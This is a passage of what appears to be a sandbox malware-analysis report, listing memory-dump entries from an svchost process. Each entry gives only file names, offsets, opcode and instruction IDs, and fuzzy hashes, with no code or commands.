• Opcode ID: 72896b1a330396105add259150a5aa621469854659cbe2ce1cf0eb8d0295e6c4
• Instruction ID: 4ea674c3856b5834d7826b0a460ed9c2d2626746306ebc901f69efb5c05c7240
• Opcode Fuzzy Hash: 72896b1a330396105add259150a5aa621469854659cbe2ce1cf0eb8d0295e6c4
• Instruction Fuzzy Hash: 3B21F5392457909FCB61EF15CA44B6ABFB4FF82B14F090869E841CFA51C7B1E948CB81

Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4bfceeb4f380ca53bf5050c500052aaa58525543d78636be35501cbda3a1528a
• Instruction ID: 1edd8c6adf7fbd78d9672c17e4ca0fa5ec13917af8e25ef80a33223c8634e383
• Opcode Fuzzy Hash: 4bfceeb4f380ca53bf5050c500052aaa58525543d78636be35501cbda3a1528a
• Instruction Fuzzy Hash: E821F1326002059FD728CE29C884BBAB3A6EFD4B00F998478ED45CB2C5DB30F845CB90

Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
• Instruction ID: 29cf7b95959cb53ef771d741ea14790b2013baa10a1e5108de3038f28e2ed88c
• Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
• Instruction Fuzzy Hash: CB218B72200300DFD71DDF15C445B6ABBE9EF95365F15816DE90ACF2A0EBB0E981CA98

Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 15fe22c4be1af1df33c71f673afd3974a7749117fae023c999d5ed66929e9545
• Instruction ID: d7283b03f35e924db2df2c6e24135d421fbaf87d967c32e58724f6b9ea097bd5
• Opcode Fuzzy Hash: 15fe22c4be1af1df33c71f673afd3974a7749117fae023c999d5ed66929e9545
• Instruction Fuzzy Hash: 70216D759002299BCB14DF59C881ABEB7F4FF48740F550069E941FB240D778AD52DBA0

Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9744420570fce007874bcda90de243c8342e87d9105de1592d7264e6eec7ffc3
• Instruction ID: c8578b5c295a74410eb680d76ddedd4b50a501c69545903d37b65a6312dd23d8
• Opcode Fuzzy Hash: 9744420570fce007874bcda90de243c8342e87d9105de1592d7264e6eec7ffc3
• Instruction Fuzzy Hash: BF21DE75600654AFC715DB68C840F6AB7B8FF88740F140069F944DB7A0D738ED10CBA8

Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ead08c21cb16d6130dfdea628e28c9e78456552765509942e8feda2f64c1f53f
• Instruction ID: ffe5c17f2c318b0886737f139f23cd58459aea9f4bdea4820008e1001b50bff9
• Opcode Fuzzy Hash: ead08c21cb16d6130dfdea628e28c9e78456552765509942e8feda2f64c1f53f
• Instruction Fuzzy Hash: 7E213831200B05DBCF71EB29CC80B26B7A6FB51228F184659E893CE6E0D731E951DB95
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e6482c83a5375706eece5e1d2e47599cdc49c405468767ec440393c90a1c442e
                                                                                                                  • Instruction ID: 3b14ed062cd254d373e38a403371b65222d070d7e71b8cb56929cc2b975137b5
                                                                                                                  • Opcode Fuzzy Hash: e6482c83a5375706eece5e1d2e47599cdc49c405468767ec440393c90a1c442e
                                                                                                                  • Instruction Fuzzy Hash: 7E21B0729043959BC711EFAAC848BABF7ECBF81240F094556BC90CB251D734DA48C6A2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7c026277872cc5e0963f605c228b607be8d88f840ed5543f7cdc629beb2de6ff
                                                                                                                  • Instruction ID: a1c996ebf0ed2adea8d9f8302c7b6fd04acadb1d4cad8cc842706384d237f455
                                                                                                                  • Opcode Fuzzy Hash: 7c026277872cc5e0963f605c228b607be8d88f840ed5543f7cdc629beb2de6ff
                                                                                                                  • Instruction Fuzzy Hash: A1210A712041905FDB45CB6A88F45B6BFE6EFC6215B0D82E6D984CB342C134D907C7A0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 89bf6f1ecdc4212d89704b192355920728476dbc43691453b374e4ba4c73497a
                                                                                                                  • Instruction ID: 27f5c82a5565e25999382ea02ce03eb21b1b659c17bf4b97bf2483c41d70d944
                                                                                                                  • Opcode Fuzzy Hash: 89bf6f1ecdc4212d89704b192355920728476dbc43691453b374e4ba4c73497a
                                                                                                                  • Instruction Fuzzy Hash: 4521AC79200B519FC724EF29C840B46B7F5AF98748F1884A8A909CB761E331E952CB94
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: a7ace08162457ef1d1688df378132f1a424b8f415785b167d21276fd43c0b749
                                                                                                                  • Instruction ID: 5ce891571dc98ddac613f3b2bdf130e431b4938c489665424d675ac60399bc73
                                                                                                                  • Opcode Fuzzy Hash: a7ace08162457ef1d1688df378132f1a424b8f415785b167d21276fd43c0b749
                                                                                                                  • Instruction Fuzzy Hash: 51216936100B50DFC721EF68CA41F19BBB5FF18748F1A4968E40ADBAA1C734E910EB44
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b626cd1ebd66efe2a1d26ed84b0573245269cba7ffd092eba36f048cde0aaa41
                                                                                                                  • Instruction ID: b42c0aaecd9f2253f29cbe90bc64f7fa5d9f73646468e13c0eddc4bf6e898cbb
                                                                                                                  • Opcode Fuzzy Hash: b626cd1ebd66efe2a1d26ed84b0573245269cba7ffd092eba36f048cde0aaa41
                                                                                                                  • Instruction Fuzzy Hash: B621B433A104119F9B18CF3DD804466F7F6EFDC31436A427AD912DB268D770BD118A84
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                  • Instruction ID: 79f3aaedb7a8b465795239431ecbc90d82aac5a3843aa8395792b261d8fb5681
                                                                                                                  • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                  • Instruction Fuzzy Hash: C311EF76604714BFD722DF85CC80FAABBB8EB80754F150029EA01EF180D676EE44DB60
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0e51d3cc6a95cbc97f25b591a414704ff124dfc185160a38a2752dfef3afbfd8
                                                                                                                  • Instruction ID: 8cb1c64f987e00113935c51753b20611786dd810b9ca04f982739bc253d2492e
                                                                                                                  • Opcode Fuzzy Hash: 0e51d3cc6a95cbc97f25b591a414704ff124dfc185160a38a2752dfef3afbfd8
                                                                                                                  • Instruction Fuzzy Hash: 99119D366007209BCB11CF59C480A6AF7EAAF4B750B198069FD08DF205D6B2EA0587A0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c00b2979cee78422589e73190f40291aa602f1b522ef73cb05ca76f8117a8cf3
                                                                                                                  • Instruction ID: 34bf41746177b0029fa73b41e0f700f485751f5745eabdb2579ea796fd50c5d4
                                                                                                                  • Opcode Fuzzy Hash: c00b2979cee78422589e73190f40291aa602f1b522ef73cb05ca76f8117a8cf3
                                                                                                                  • Instruction Fuzzy Hash: A8210779A003488BE725DF5DC5487EDB7B4FB8A318F2D8018C811DB2D0CBB89A45CB50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 30dcca66137ef2276ed95199b2e6707e49d37b17252db808dc964d1e8b2b7be8
                                                                                                                  • Instruction ID: 84826ca0f325f18bf7fd52bfbd9749b84de35f61435ddb4f8250a0f006d6b03b
                                                                                                                  • Opcode Fuzzy Hash: 30dcca66137ef2276ed95199b2e6707e49d37b17252db808dc964d1e8b2b7be8
                                                                                                                  • Instruction Fuzzy Hash: A0215E75A00205DFCB14CF99C581AAEBBB5FB89314F24416DE105EB350C772AE0ACBD0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 148937d03ba7c441f10769c27e4fda6e5432889d6a4c8982593179ba9f6183ae
                                                                                                                  • Instruction ID: 845c494c502a3506b526fce0f5a4d5dc361e75d4b006c9b5069de135b4ec27fe
                                                                                                                  • Opcode Fuzzy Hash: 148937d03ba7c441f10769c27e4fda6e5432889d6a4c8982593179ba9f6183ae
                                                                                                                  • Instruction Fuzzy Hash: 69215675611B00EFC720DF69C881B66B3F8FF84250F44882DE5AACB650DA70AD60DBA0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c85dae548149101cf856714e7dff0bc2c8dfbb6b59ab697cc238b8eb4ce4dc0f
                                                                                                                  • Instruction ID: d6501194c4f197e5688c8505e78efc7c54c0b4032946b35b9c91651946f318dd
                                                                                                                  • Opcode Fuzzy Hash: c85dae548149101cf856714e7dff0bc2c8dfbb6b59ab697cc238b8eb4ce4dc0f
                                                                                                                  • Instruction Fuzzy Hash: 2211E27F010640EAD730FF56D901A727BA8EBB4B84F144065E800DB358E738DE01CB64
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 32755500ce7151faa8850d394bd09d3b4547de4b35fd8aad6018725e3309bbe7
                                                                                                                  • Instruction ID: 7b6e3cd28f0ba25faa3acc23b8e4be216cb1aa7f326c0eafae0b4d01cd0efe48
                                                                                                                  • Opcode Fuzzy Hash: 32755500ce7151faa8850d394bd09d3b4547de4b35fd8aad6018725e3309bbe7
                                                                                                                  • Instruction Fuzzy Hash: 6F11CE76A01344EFCB24DF59D5C0A5ABBE8EF94650F1A8079E905DF310DA70DE10CBA0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5f629486d06ba5293cea0ab9bc75405e88b7907b4448fe1dd98bdb4fd1b5a73e
                                                                                                                  • Instruction ID: 499c63169c64a662fd5881d3787f5bd2fa1a97c018c6ec8bba0f0120fbf4f6eb
                                                                                                                  • Opcode Fuzzy Hash: 5f629486d06ba5293cea0ab9bc75405e88b7907b4448fe1dd98bdb4fd1b5a73e
                                                                                                                  • Instruction Fuzzy Hash: 722152B2A502059FD754DF2AE884A42BBF5FB5D210B8585BAE90CCF24AE770D844CB90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 914b6323b2efa39914e25e9993f52a19d517a3f8de8c3e0d3f59ceec9a00deac
                                                                                                                  • Instruction ID: 216285a4be265a4151c83fff3c8e58c0bd757b409737cee5fba9f7763617fca9
                                                                                                                  • Opcode Fuzzy Hash: 914b6323b2efa39914e25e9993f52a19d517a3f8de8c3e0d3f59ceec9a00deac
                                                                                                                  • Instruction Fuzzy Hash: 3D01043B605684ABE316E2AA9888F27B6DCEF80354F0A0465F800CF641DA14DC00C2A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fd725b15f23d3c654f1db45f53ca4294ed68f3d55b07656975ebf8e0ad7d5a23
                                                                                                                  • Instruction ID: fc9ceae544f2f69cfe9e299b11b543f30f60e535ea48e82adb84b581e6f3c20e
                                                                                                                  • Opcode Fuzzy Hash: fd725b15f23d3c654f1db45f53ca4294ed68f3d55b07656975ebf8e0ad7d5a23
                                                                                                                  • Instruction Fuzzy Hash: 3901D6B6B04300ABD710EBBA9C81F6BBAF8EFD4314F050029FA05CB141EA70ED409625
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  • Opcode ID: a24f52cdb8288cb79fc50fb6bee831d4ad8badaeb1e95628220fc13d97c47883
                                                                                                                  • Instruction ID: 8c4eb2490f59abac4f0d8c860b9c67f4e7a9ab519ac111a68078e5964c945c8f
                                                                                                                  • Opcode Fuzzy Hash: a24f52cdb8288cb79fc50fb6bee831d4ad8badaeb1e95628220fc13d97c47883
                                                                                                                  • Instruction Fuzzy Hash: 2D017177900129DBCB28CF49C590BADBBA5EF44710F1900B9EC06EB340DB71AE40DB98
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                                  • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                                                                  • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                                  • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 66dac3e2e2e4d1f0187bb88953667efaeb0c694839f17cdc05bde3cee3794d56
                                                                                                                  • Instruction ID: 8a1495d8d9d4f57ddaa5a3836f358f316c86dcca380aaae98ed6ee6f97e92d49
                                                                                                                  • Opcode Fuzzy Hash: 66dac3e2e2e4d1f0187bb88953667efaeb0c694839f17cdc05bde3cee3794d56
                                                                                                                  • Instruction Fuzzy Hash: C7118078D10249EFCB04DFA9D444A9EB7B4FF18704F14805AB814EB380D774DA02CB95
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                  • Instruction ID: ab5b5d546514d78179847919d1c7de3a7f08a707c974f547f1120e4177486e74
                                                                                                                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                  • Instruction Fuzzy Hash: 55F0FC372447329BC732D6598880FBFBE958FC5AE4F1A8435E109DF204CAA48C0166D0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e42647fbc2903431ac5fc9562641d1b7d6cb67f74037af0cc444dacae4bd6e71
                                                                                                                  • Instruction ID: 9509ad6e08b1cb302e539cd7e964c7de4bce2119415bcdae78b5fdebd469852c
                                                                                                                  • Opcode Fuzzy Hash: e42647fbc2903431ac5fc9562641d1b7d6cb67f74037af0cc444dacae4bd6e71
                                                                                                                  • Instruction Fuzzy Hash: 40012175A10249ABDB04DF69D941ADEBBB8FF49700F14405AE900E7380D674DA018BA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 02dbca4db7effb4c93269f8c40031e3efd53de2d78438c8b042b6b588446f022
                                                                                                                  • Instruction ID: 99aa39236a86f66b4e91fe6b5b406a480cded04fcbc65302d24893fe472929b5
                                                                                                                  • Opcode Fuzzy Hash: 02dbca4db7effb4c93269f8c40031e3efd53de2d78438c8b042b6b588446f022
                                                                                                                  • Instruction Fuzzy Hash: F4012175A10349ABDB04DF69E945ADEB7B8FF49700F50405AE900F7380D674D9018BA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 380fd8eed4971adc9473b9ee9dd09704223ef240ce99881cc60853f8acb226bf
                                                                                                                  • Instruction ID: ce3225f657b6c9ea5f743dccbd6b56786e6c4971797550520b601669804131b7
                                                                                                                  • Opcode Fuzzy Hash: 380fd8eed4971adc9473b9ee9dd09704223ef240ce99881cc60853f8acb226bf
                                                                                                                  • Instruction Fuzzy Hash: B9012C75A10349ABDB04DFA9D941AEEBBB9FF49700F10405AF901EB381D674EA018BA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                  • Instruction ID: d313dc013c0730c13839ad5c0576671c2b78b74b30814ecb3f20dd6e12f249e3
                                                                                                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                  • Instruction Fuzzy Hash: 0DF0C2B3A00610ABD324CF4DDC40E57F7EADBD4A80F098128A905CB220EA31DD04CB90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                  • Instruction ID: ee200f05d0ac3732bebb1c45d4ed8ca7a26047699fd6f6167705117408750c21
                                                                                                                  • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                  • Instruction Fuzzy Hash: 27F0FF72A11214AFE319CF5CC880F6AF7EDEB46650F194079D500DF230E671DE04CA94
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 52f232ad0e7aea1cddb06a4f45cde02051b5c1860a84953984b34101ae632e27
                                                                                                                  • Instruction ID: c4039667aba58132707657c66d2a809317195772e57f7e57fa16e48224328b47
                                                                                                                  • Opcode Fuzzy Hash: 52f232ad0e7aea1cddb06a4f45cde02051b5c1860a84953984b34101ae632e27
                                                                                                                  • Instruction Fuzzy Hash: F9010CB5E00749AFCB04DFA9D545AAEBBF4FF48304F11806AE855EB341E674DA00DB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6f0a17e865466dfca079ec170e0af6579c41dee8bb7b78da35b067e17e13e831
                                                                                                                  • Instruction ID: 3564f3bdf926857e77654aebe9e807902d42407a753ad3b89f9e7a53d5330844
                                                                                                                  • Opcode Fuzzy Hash: 6f0a17e865466dfca079ec170e0af6579c41dee8bb7b78da35b067e17e13e831
                                                                                                                  • Instruction Fuzzy Hash: 90F06876F10348ABDB14DFB9D805AEEB7B8EF44710F01805AE551EB290DA74DA019791
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 32c6e7bb9cdd26ca1f63edc4a7b0434f363218b78fc1ca57966d3c4a80cab349
                                                                                                                  • Instruction ID: d20a33663720d1899999862cf9c77b3bd5703e706a97b84c5466b5ee3888c61a
                                                                                                                  • Opcode Fuzzy Hash: 32c6e7bb9cdd26ca1f63edc4a7b0434f363218b78fc1ca57966d3c4a80cab349
                                                                                                                  • Instruction Fuzzy Hash: 32018F71A00258DBCB04DFA9D845AEEBBF8FF48710F14005AE900EB380D774EA01CB95
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                                                  • Instruction ID: 76ec125fc5d8741fa727e076ca71cc5ce99205ccb6eb4bdf0fd5a3d796dda9c4
                                                                                                                  • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
